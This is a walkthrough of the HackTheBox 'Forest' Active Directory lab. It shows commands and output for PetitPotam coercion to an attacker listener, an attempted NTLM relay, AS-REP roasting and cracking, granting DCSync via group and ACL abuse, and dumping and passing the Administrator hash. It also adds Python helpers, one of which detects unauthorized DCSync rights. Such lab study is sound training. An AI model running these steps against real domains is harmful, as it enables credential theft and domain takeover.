
Forest

Recon

nmap --open -T4 -p- 10.129.21.43

nmap -sVC -p53,135,389,445,593,5985,47001 10.129.21.43
# Starting Nmap 7.93 ( https://nmap.org ) at 2025-12-21 15:00 CET
# Nmap scan report for 10.129.21.43
# Host is up (0.034s latency).

# PORT      STATE SERVICE      VERSION
# 53/tcp    open  domain       Simple DNS Plus
# 135/tcp   open  msrpc        Microsoft Windows RPC
# 389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
# 445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
# 593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
# 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
# |_http-title: Not Found
# |_http-server-header: Microsoft-HTTPAPI/2.0
# 47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
# |_http-title: Not Found
# |_http-server-header: Microsoft-HTTPAPI/2.0
# Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

# Host script results:
# |_clock-skew: mean: 2h48m00s, deviation: 4h37m08s, median: 7m59s
# | smb2-security-mode:
# |   311:
# |_    Message signing enabled and required
# | smb-os-discovery:
# |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
# |   Computer name: FOREST
# |   NetBIOS computer name: FOREST\x00
# |   Domain name: htb.local
# |   Forest name: htb.local
# |   FQDN: FOREST.htb.local
# |_  System time: 2025-12-21T06:08:33-08:00
# | smb2-time:
# |   date: 2025-12-21T14:08:34
# |_  start_date: 2025-12-21T14:05:38
# | smb-security-mode:
# |   account_used: <blank>
# |   authentication_level: user
# |   challenge_response: supported
# |_  message_signing: required

# Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done: 1 IP address (1 host up) scanned in 22.00 seconds

DNS

dig all "HTB.LOCAL" @10.129.21.43

# ; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> all HTB.LOCAL @10.129.21.43
# ;; QUESTION SECTION:
# ;HTB.LOCAL.			IN	A

# ;; ANSWER SECTION:
# HTB.LOCAL.		600	IN	A	10.129.21.43
# HTB.LOCAL.		600	IN	A	10.129.95.210

# ;; Query time: 30 msec
# ;; SERVER: 10.129.21.43#53(10.129.21.43) (UDP)
# ;; WHEN: Sun Dec 21 15:09:13 CET 2025
# ;; MSG SIZE  rcvd: 82

RPC

rpcclient -U'%' FOREST

rpcclient $> querydominfo
# Domain:		HTB
# Server:
# Comment:
# Total Users:	105
# Total Groups:	0
# Total Aliases:	0
# Sequence No:	1
# Force Logoff:	-1
# Domain Server State:	0x1
# Server Role:	ROLE_DOMAIN_PDC
# Unknown 3:	0x1

rpcclient $> getdompwinfo
# min_password_length: 7
# password_properties: 0x00000000

rpcclient $> enumdomusers
# user:[Administrator] rid:[0x1f4]
# user:[Guest] rid:[0x1f5]
# user:[krbtgt] rid:[0x1f6]
# user:[DefaultAccount] rid:[0x1f7]
# user:[$331000-VK4ADACQNUCA] rid:[0x463]
# user:[SM_2c8eef0a09b545acb] rid:[0x464]
# user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
# user:[SM_75a538d3025e4db9a] rid:[0x466]
# user:[SM_681f53d4942840e18] rid:[0x467]
# user:[SM_1b41c9286325456bb] rid:[0x468]
# user:[SM_9b69f1b9d2cc45549] rid:[0x469]
# user:[SM_7c96b981967141ebb] rid:[0x46a]
# user:[SM_c75ee099d0a64c91b] rid:[0x46b]
# user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
# user:[HealthMailboxc3d7722] rid:[0x46e]
# user:[HealthMailboxfc9daad] rid:[0x46f]
# user:[HealthMailboxc0a90c9] rid:[0x470]
# user:[HealthMailbox670628e] rid:[0x471]
# user:[HealthMailbox968e74d] rid:[0x472]
# user:[HealthMailbox6ded678] rid:[0x473]
# user:[HealthMailbox83d6781] rid:[0x474]
# user:[HealthMailboxfd87238] rid:[0x475]
# user:[HealthMailboxb01ac64] rid:[0x476]
# user:[HealthMailbox7108a4e] rid:[0x477]
# user:[HealthMailbox0659cc1] rid:[0x478]
# user:[sebastien] rid:[0x479]
# user:[lucinda] rid:[0x47a]
# user:[svc-alfresco] rid:[0x47b]
# user:[andy] rid:[0x47e]
# user:[mark] rid:[0x47f]
# user:[santi] rid:[0x480]
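The AS-REP roast further down feeds a users.txt to GetNPUsers.py without showing how it was built from this listing. Added example (not from the original writeup): a Python filter over rpcclient's enumdomusers output that drops the Exchange-provisioned SM_/HealthMailbox/$... accounts and the built-ins, and writes the remaining names to users.txt. The sample lines are a constructed subset of the listing above; which prefixes count as noise is my assumption.

```python
import re

# Constructed sample of `rpcclient $> enumdomusers` output (subset of the listing above).
SAMPLE = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
"""

LINE_RE = re.compile(r"user:\[(?P<name>[^\]]+)\] rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")

# Assumption: Exchange creates SM_*, HealthMailbox* and $331000-* system mailboxes; they are
# noise for roasting and spraying. krbtgt/DefaultAccount/Guest are dropped as well.
NOISE_PREFIXES = ("SM_", "HealthMailbox", "$")
BUILTIN = {"Guest", "krbtgt", "DefaultAccount"}


def parse_enumdomusers(text):
    """Return (name, rid) pairs, RID as an int, from rpcclient enumdomusers output."""
    users = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            users.append((m.group("name"), int(m.group("rid"), 16)))
    return users


def candidate_users(text):
    """Names worth feeding to GetNPUsers.py or a password spray, in listing order."""
    return [name for name, _ in parse_enumdomusers(text)
            if not name.startswith(NOISE_PREFIXES) and name not in BUILTIN]


def write_users(names, path="users.txt"):
    """Write one name per line, the format GetNPUsers.py -usersfile expects; returns the count."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(names) + "\n")
    return len(names)


if __name__ == "__main__":
    names = candidate_users(SAMPLE)
    print(f"{write_users(names)} candidate users written:", ", ".join(names))
```

Run it against the real listing by piping `rpcclient -U'%' -c enumdomusers FOREST` into the script instead of SAMPLE; Guest is dropped on purpose, which is why it would not show up as the KDC_ERR_CLIENT_REVOKED line in the GetNPUsers.py run below.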
rpcdump.py -p 135 FOREST
# <SNIP>
# Protocol: N/A
# Provider: efssvc.dll
# UUID    : 04EEB297-CBF4-466B-8A2A-BFD6A2F10BBA v1.0 EFSK RPC Interface
# Bindings:
#           ncacn_np:\\FOREST[\pipe\efsrpc]
#           ncalrpc:[LRPC-e5f53aa13aca071522]

# Protocol: N/A
# Provider: efssvc.dll
# UUID    : DF1941C5-FE89-4E79-BF10-463657ACF44D v1.0 EFS RPC Interface
# Bindings:
#           ncacn_np:\\FOREST[\pipe\efsrpc]
#           ncalrpc:[LRPC-e5f53aa13aca071522]
# <SNIP>

rpcdump shows the MS-EFSRPC interface (df1941c5-fe89-4e79-bf10-463657acf44d) reachable over \pipe\efsrpc, which is the PetitPotam coercion vector, so the machine is very likely vulnerable to authentication coercion. Let's confirm with netexec.

SMB

nxc smb "FOREST" -u '' -p '' -M coerce_plus
# SMB         10.129.21.43    445    FOREST           [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
# SMB         10.129.21.43    445    FOREST           [+] htb.local\:
# COERCE_PLUS 10.129.21.43    445    FOREST           VULNERABLE, PetitPotam

SMB signing is required (so a coerced machine-account authentication cannot simply be relayed back to SMB), SMBv1 is still enabled, and coerce_plus confirms that PetitPotam coercion works without credentials.

Attempting to coerce

petitpotam.py -d "htb.local" 10.10.15.34 10.129.21.43

#               ___            _        _      _        ___            _
#              | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __
#              |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \
#             _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_|
#           _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
#           "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'

#               PoC to elicit machine account authentication via some MS-EFSRPC functions
#                                       by topotam (@topotam77)

#                      Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



# Trying pipe lsarpc
# [-] Connecting to ncacn_np:10.129.21.43[\PIPE\lsarpc]
# [+] Connected!
# [+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
# [+] Successfully bound!
# [-] Sending EfsRpcOpenFileRaw!
# [+] Got expected ERROR_BAD_NETPATH exception!!
# [+] Attack worked!
Responder was started beforehand to catch the coerced connection (-A is analyze mode, so nothing on the network gets poisoned):

responder -I tun0 -dA
# [+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
# [SMB] NTLMv2-SSP Client   : 10.129.21.43
# [SMB] NTLMv2-SSP Username : HTB\FOREST$
# [SMB] NTLMv2-SSP Hash     : FOREST$::HTB:1122334455667788:<SNIP>

^C
cp /opt/tools/Responder/logs/SMB-NTLMv2-SSP-10.129.21.43.txt .

hashcat -m 5600 -a 0 SMB-NTLMv2-SSP-10.129.21.43.txt `fzf-wordlists`

Could not crack it, which is expected: a machine account's password is a random 120-character string that Windows rotates every 30 days, so no wordlist will contain it. Instead let's try relaying:

nxc ldap "10.129.21.43" -u '' -p ''
# LDAP        10.129.21.43    389    FOREST           [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local) (signing:None) (channel binding:No TLS cert)
# LDAP        10.129.21.43    389    FOREST           [+] htb.local\:

SMB requires signing but LDAP does not (no signing enforced, no channel binding), so relaying the coerced SMB authentication to LDAP is the obvious thing to try, though it may fail:

ntlmrelayx -t ldap://10.129.21.43 -smb2support --interactive
# Impacket v0.13.0.dev0+20250717.182627.84ebce48 - Copyright Fortra, LLC and its affiliated companies

# [*] Servers started, waiting for connections

petitpotam.py -d "htb.local" 10.10.15.34 10.129.21.43
# <SNIP>

# [*] SMBD-Thread-6 (process_request_thread): Received connection from 10.129.21.43, attacking target ldap://10.129.21.43
# [!] The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)
# [-] Authenticating against ldap://10.129.21.43 as HTB/FOREST$ FAILED
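Why the relay dies before it reaches LDAP: the decision is made on the NegotiateFlags of the client's NTLM NEGOTIATE message, not on anything the LDAP server says. Added Python example (not from the writeup or from impacket) that builds and inspects constructed Type 1 messages and applies the same rule ntlmrelayx reports above; the two flag sets are my assumptions about a typical SMB-originating and HTTP/WebDAV-originating Windows client.

```python
import struct

# NegotiateFlags bits from MS-NLMP 2.2.2.5 (the ones that matter for relaying).
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_REQUEST_TARGET = 0x00000004
NTLMSSP_NEGOTIATE_SIGN = 0x00000010
NTLMSSP_NEGOTIATE_SEAL = 0x00000020
NTLMSSP_NEGOTIATE_NTLM = 0x00000200
NTLMSSP_NEGOTIATE_ALWAYS_SIGN = 0x00008000
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000
NTLMSSP_NEGOTIATE_128 = 0x20000000
NTLMSSP_NEGOTIATE_KEY_EXCH = 0x40000000
NTLMSSP_NEGOTIATE_56 = 0x80000000

FLAG_NAMES = {
    NTLMSSP_NEGOTIATE_UNICODE: "UNICODE", NTLMSSP_REQUEST_TARGET: "REQUEST_TARGET",
    NTLMSSP_NEGOTIATE_SIGN: "SIGN", NTLMSSP_NEGOTIATE_SEAL: "SEAL",
    NTLMSSP_NEGOTIATE_NTLM: "NTLM", NTLMSSP_NEGOTIATE_ALWAYS_SIGN: "ALWAYS_SIGN",
    NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY: "EXTENDED_SESSIONSECURITY",
    NTLMSSP_NEGOTIATE_128: "128", NTLMSSP_NEGOTIATE_KEY_EXCH: "KEY_EXCH", NTLMSSP_NEGOTIATE_56: "56",
}

# Assumed flag sets. ALWAYS_SIGN is set by practically every client and is harmless;
# SIGN is what SMB clients add and what makes the LDAP server expect signed traffic.
SMB_CLIENT = (NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_REQUEST_TARGET | NTLMSSP_NEGOTIATE_SIGN
              | NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_ALWAYS_SIGN
              | NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY | NTLMSSP_NEGOTIATE_128
              | NTLMSSP_NEGOTIATE_KEY_EXCH | NTLMSSP_NEGOTIATE_56)
HTTP_CLIENT = SMB_CLIENT & ~NTLMSSP_NEGOTIATE_SIGN & ~NTLMSSP_NEGOTIATE_KEY_EXCH


def build_negotiate(flags: int) -> bytes:
    """Constructed NEGOTIATE_MESSAGE: signature, MessageType 1, flags, two empty name fields."""
    return b"NTLMSSP\x00" + struct.pack("<II", 1, flags) + b"\x00" * 16


def negotiate_flags(msg: bytes) -> int:
    """NegotiateFlags sit at offset 12 of a Type 1 message."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack("<I", msg[8:12])[0] != 1:
        raise ValueError("not an NTLM NEGOTIATE_MESSAGE")
    return struct.unpack("<I", msg[12:16])[0]


def flag_names(flags: int):
    return [name for bit, name in sorted(FLAG_NAMES.items()) if flags & bit]


def relay_verdict(msg: bytes, target_scheme: str, target_requires_signing: bool = False) -> str:
    """Decide, from the client's flags alone, whether relaying this exchange can work.
    Clearing SIGN in flight is the old 'drop the MIC' trick; patched hosts (CVE-2019-1040)
    reject the tampered AUTHENTICATE, so the flags are taken as given here."""
    flags = negotiate_flags(msg)
    scheme = target_scheme.lower()
    if scheme == "ldap" and flags & NTLMSSP_NEGOTIATE_SIGN:
        return "FAIL: client requested signing; LDAP server will expect signed messages we cannot produce"
    if scheme == "smb" and target_requires_signing:
        return "FAIL: target requires SMB signing"
    return "OK"


if __name__ == "__main__":
    for label, flags in (("SMB client", SMB_CLIENT), ("HTTP client", HTTP_CLIENT)):
        msg = build_negotiate(flags)
        print(label, flag_names(flags))
        print("  -> ldap:", relay_verdict(msg, "ldap"))
        print("  -> smb (signing required):", relay_verdict(msg, "smb", True))
```

This is also why coercion methods that trigger an HTTP/WebDAV client (instead of the SMB client PetitPotam provokes here) are the usual way around the SMB-to-LDAP signing problem.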

There is no IIS on the target to try relaying through HTTP either.

Cross machine auth using the second IP I found in DNS doesn't work either.

Retrieve AS-REP hash for svc-alfresco

I had the list of users via RPC:

GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile users.txt -dc-ip 10.129.21.43 htb.local/
# Impacket v0.13.0.dev0+20250717.182627.84ebce48 - Copyright Fortra, LLC and its affiliated companies

# [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
# [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
# [-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
# [-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
# $krb5asrep$23$svc-alfresco@HTB.LOCAL:<SNIP>
# [-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
# [-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
# [-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
hashcat -m 18200 -a 0 ASREProastables.txt `fzf-wordlists`
# <SNIP>
# $krb5asrep$23$svc-alfresco@HTB.LOCAL:<SNIP>:s3rvice

# Session..........: hashcat
# Status...........: Cracked
# <SNIP>

# Started: Sun Dec 21 15:57:01 2025
# Stopped: Sun Dec 21 15:57:19 2025

nxc smb 10.129.21.43 -u svc-alfresco -p s3rvice --shares
# SMB         10.129.21.43    445    FOREST           [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
# SMB         10.129.21.43    445    FOREST           [+] htb.local\svc-alfresco:s3rvice
# SMB         10.129.21.43    445    FOREST           [*] Enumerated shares
# SMB         10.129.21.43    445    FOREST           Share           Permissions     Remark
# SMB         10.129.21.43    445    FOREST           -----           -----------     ------
# SMB         10.129.21.43    445    FOREST           ADMIN$                          Remote Admin
# SMB         10.129.21.43    445    FOREST           C$                              Default share
# SMB         10.129.21.43    445    FOREST           IPC$            READ            Remote IPC
# SMB         10.129.21.43    445    FOREST           NETLOGON        READ            Logon server share
# SMB         10.129.21.43    445    FOREST           SYSVOL          READ            Logon server share

nxc winrm 10.129.21.43 -u svc-alfresco -p s3rvice
# WINRM       10.129.21.43    5985   FOREST           [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
# WINRM       10.129.21.43    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (admin)

svc-alfresco can authenticate over WinRM; logging in, we find the user flag.

Root

Nothing more of interest on the box itself; Windows Defender seems to be enabled.

The box name hints towards AD forests (trusts), though PowerView will get quarantined by WinDef.

Let's try bloodhound first:

faketime "$(rdate -n FOREST -p | awk '{print $2, $3, $4}' | date -f - "+%Y-%m-%d %H:%M:%S")" zsh

nxc ldap 10.129.21.43 -u svc-alfresco -p s3rvice --bloodhound -c All --dns-server 10.129.21.43
# LDAP        10.129.21.43    389    FOREST           [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local) (signing:None) (channel binding:No TLS cert)
# LDAP        10.129.21.43    389    FOREST           [+] htb.local\svc-alfresco:s3rvice
# LDAP        10.129.21.43    389    FOREST           Resolved collection methods: psremote, acl, rdp, container, session, trusts, dcom, objectprops, localadmin, group
# LDAP        10.129.21.43    389    FOREST           Done in 0M 12S
# LDAP        10.129.21.43    389    FOREST           Compressing output into /root/.nxc/logs/FOREST_10.129.21.43_2025-12-21_161524_bloodhound.zip

I tested uploading SharpHound; it seems WinDef doesn't care.

Administrator has a session on FOREST.

svc-alfresco is a member of "Account Operators" (via nested group membership), which has GenericAll over the non-protected users and groups in the domain, including "Exchange Windows Permissions"; that group in turn holds WriteDacl on the domain object.

Import-Module .\PowerView.ps1
Get-DomainTrust
Get-DomainTrustMapping
cmd /c 'netdom query /domain:forest.htb.local dc'
# The specified domain either does not exist or could not be contacted.

# The command failed to complete successfully.

cmd /c 'netdom query /domain:htb.local workstation'
# List of workstations with accounts in the domain:

# EXCH01      ( Workstation or Server )

# The command completed successfully.

I don't know if EXCH01 is relevant (we have GenericAll over it). Let's focus on Administrator having a session on FOREST.

I can't see any forest or trust relationship. Let's see if we can abuse our privileges and join "Exchange Windows Permissions"; if that doesn't reveal anything new, we can still use it to perform a Shadow Credentials attack on FOREST.htb.local.

bloodyAD --host 10.129.21.43 -d htb.local -u svc-alfresco -p s3rvice add groupMember "EXCHANGE WINDOWS PERMISSIONS" svc-alfresco
# [+] svc-alfresco added to EXCHANGE WINDOWS PERMISSIONS
bloodyAD --host 10.129.21.43 -d htb.local -u 'svc-alfresco' -p 's3rvice' add dcsync 'svc-alfresco'
# [+] svc-alfresco is now able to DCSync
secretsdump -just-dc-user Administrator "htb.local/svc-alfresco:s3rvice@htb.local"
# Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# [*] Using the DRSUAPI method to get NTDS.DIT secrets
# htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
# [*] Kerberos keys grabbed
# htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
# htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
# htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
# [*] Cleaning up...

Pass-the-Hash over WinRM with the Administrator NT hash and read root.txt.
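The `add dcsync` step above works by writing two extended-right ACEs onto the domain head, and that is also how a defender spots it afterwards. Added Python example (not from the writeup): it parses the domain object's DACL in SDDL form, the string `(Get-Acl "AD:\DC=htb,DC=local").Sddl` returns, and lists every trustee holding both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, then flags the ones that are not expected. The SDDL sample is constructed; S-1-5-21-1111-2222-3333 is a placeholder domain SID, and RID 1147 (0x47b) is svc-alfresco's RID from the rpcclient listing.

```python
import re

GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
DCSYNC_RIGHTS = {GET_CHANGES, GET_CHANGES_ALL}

# Constructed DACL for the domain head after the bloodyAD command: Administrators (BA) and
# Domain Controllers (-516) legitimately hold both rights, Enterprise DCs (S-1-5-9) only
# Get-Changes, Domain Admins (DA) full control, and svc-alfresco (-1147) the freshly added pair.
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    f"(OA;;CR;{GET_CHANGES};;BA)"
    f"(OA;;CR;{GET_CHANGES_ALL};;BA)"
    f"(OA;;CR;{GET_CHANGES};;S-1-5-21-1111-2222-3333-516)"
    f"(OA;;CR;{GET_CHANGES_ALL};;S-1-5-21-1111-2222-3333-516)"
    f"(OA;;CR;{GET_CHANGES};;S-1-5-9)"
    f"(OA;;CR;{GET_CHANGES};;S-1-5-21-1111-2222-3333-1147)"
    f"(OA;;CR;{GET_CHANGES_ALL};;S-1-5-21-1111-2222-3333-1147)"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "S:AI(AU;SA;CR;;;WD)"
)
# Assumed baseline for a plain domain; adjust for AAD Connect, backup agents, etc.
EXPECTED = {"BA", "DA", "S-1-5-21-1111-2222-3333-516"}


def parse_aces(sddl: str):
    """Yield (ace_type, rights, object_guid, trustee) for each ACE in the DACL only.
    Rights are assumed to be in two-letter form (CR, GA, ...), not the hex mask form."""
    m = re.search(r"D:([A-Z]*(?:\([^)]*\))*)", sddl)
    if not m:
        return
    for ace in re.finditer(r"\(([^)]*)\)", m.group(1)):
        parts = ace.group(1).split(";")
        if len(parts) < 6:
            continue
        ace_type, _flags, rights, obj, _inherit_obj, trustee = parts[:6]
        rights_set = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        yield ace_type, rights_set, obj.lower(), trustee


def _granted_replication_rights(rights, obj):
    """Which of the two DCSync rights a single ACE conveys."""
    if "GA" in rights and obj == "":        # GenericAll on the object: everything
        return set(DCSYNC_RIGHTS)
    if "CR" in rights and obj == "":        # all control-access (extended) rights
        return set(DCSYNC_RIGHTS)
    if "CR" in rights and obj in DCSYNC_RIGHTS:
        return {obj}
    return set()


def dcsync_capable(sddl: str):
    """Trustees whose allow ACEs, minus any deny ACEs, cover both replication rights."""
    allowed, denied = {}, {}
    for ace_type, rights, obj, trustee in parse_aces(sddl):
        conveyed = _granted_replication_rights(rights, obj)
        bucket = allowed if ace_type in ("A", "OA") else denied if ace_type in ("D", "OD") else None
        if bucket is not None and conveyed:
            bucket.setdefault(trustee, set()).update(conveyed)
    return {t for t, rights in allowed.items()
            if DCSYNC_RIGHTS <= (rights - denied.get(t, set()))}


def unexpected_dcsync(sddl: str, expected=EXPECTED):
    return dcsync_capable(sddl) - set(expected)


if __name__ == "__main__":
    print("can DCSync :", sorted(dcsync_capable(SAMPLE_SDDL)))
    print("unexpected :", sorted(unexpected_dcsync(SAMPLE_SDDL)))
```

Two-letter SID aliases such as BA and DA are reported as-is; resolve them (and RIDs like 1147) against the domain with PowerView's ConvertFrom-SID or `Get-ADObject -Filter {objectSid -eq ...}` when you want names.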